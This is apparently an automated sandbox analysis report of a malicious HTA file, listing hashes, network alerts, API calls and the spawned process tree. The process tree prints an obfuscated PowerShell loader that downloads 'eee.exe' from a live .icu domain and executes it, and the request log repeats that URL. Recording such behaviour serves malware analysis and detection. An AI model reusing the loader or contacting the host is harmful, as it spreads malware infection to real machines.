Summary | ZeroBOX

bazila.hta

Emotet Gen1 Generic Malware UPX Antivirus Malicious Library AntiDebug MSOffice File OS Processor Check PE32 PE File AntiVM dll PowerShell DllRegisterServer
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 27, 2023, 10:01 a.m. Sept. 27, 2023, 10:03 a.m.
Size 1.0MB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 085f5a95ff83ee0a711882dfbd5b0d1b
SHA256 0de4337760052c1303fdaa456ed362019bb6ae40d8fc76b6fce4f8753367c56a
CRC32 45E4B628
ssdeep 6144:eNJ/Vi00bCLCCwgSiULOazv69jmCcDSGQ8/I19JTi21nrERidIth5vYU+fGkIylW:YNg
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\bazila.hta.html

    2612
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409

      2700
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;

        2924

IP Address Status Action
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
172.67.201.91 Active Moloch
185.138.255.1 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2026888 ET INFO DNS Query for Suspicious .icu Domain Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 172.67.201.91:443 2026889 ET INFO Suspicious Domain (*.icu) in TLS SNI Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 172.67.201.91:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49177 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49181 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49175 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49189 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49183 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49190 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49187 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49178 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49202 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49193 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49209 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49194 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49218 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49182 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49227 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49185 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49228 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49212 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49232 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49213 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49239 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49179 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49237 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49247 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49241 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49255 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49191 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49250 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49197 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49265 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49199 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49266 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.101:49198 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49201 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49268 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49205 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49279 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49207 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49226 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49211 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49253 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49195 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49254 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49222 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49260 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49219 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49223 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49225 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49267 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49235 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49229 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49271 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49234 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49272 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49258 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49243 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49273 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49263 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49233 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49248 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49269 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49249 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49275 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49257 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49277 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49245 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49259 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49251 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49281 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49256 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49261 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49274 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49280 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49186 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49192 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49203 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49208 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49215 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49217 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49221 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.138.255.1:443 -> 192.168.56.101:49231 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49236 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49242 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49270 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.138.255.1:443 -> 192.168.56.101:49283 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 185.138.255.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49170
172.67.201.91:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:95:81:dc:bd:13:6a:66:98:77:47:58:d8:97:25:39:ab:72:44:cf

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002f70c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b7b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b7b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b7b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e5a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e5a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e5a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e5a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000038e5a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b7b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b7b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53b970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a1510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a1510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a1580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a1580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b56cc40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b56cc40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53bac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd4fa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 106620048
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 106626000
registers.r11: 106621808
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1891414747
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET https://zyp6be3wyc01.one-clickr.icu/eee.exe
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://zyp6be3wyc01.one-clickr.icu/eee.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 8261632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
